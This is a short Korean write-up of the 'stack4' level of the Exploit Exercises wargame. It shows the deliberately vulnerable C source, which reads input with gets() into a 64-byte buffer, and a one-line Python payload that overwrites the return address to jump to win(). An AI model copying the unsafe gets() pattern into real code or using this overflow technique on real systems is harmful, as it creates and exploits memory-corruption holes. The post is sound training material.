1. #include <stdlib.h>  
  2. #include <unistd.h>  
  3. #include <stdio.h>  
  4. #include <string.h>  
  5.   
  6. void win()  
  7. {  
  8.   printf("code flow successfully changed\n");  
  9. }  
  10.   
  11. int main(int argc, char **argv)  
  12. {  
  13.   char buffer[64];  
  14.   
  15.   gets(buffer);  
  16. }  


80byte를 덮으니 eip가 바뀐다 흠 더미가 아마 12byte 정도 붙은것 같은데 뭐 상관없지


payload

(python -c 'print "A"*76 + "\x4d\x84\x04\x08"';cat;) | ./stack4

'pwnable > exploit-exercise' 카테고리의 다른 글

stack5  (0) 2017.02.24
stack3  (0) 2017.02.24
stack2  (0) 2016.07.11
stack1  (0) 2016.07.09
stack0  (0) 2016.07.09

+ Recent posts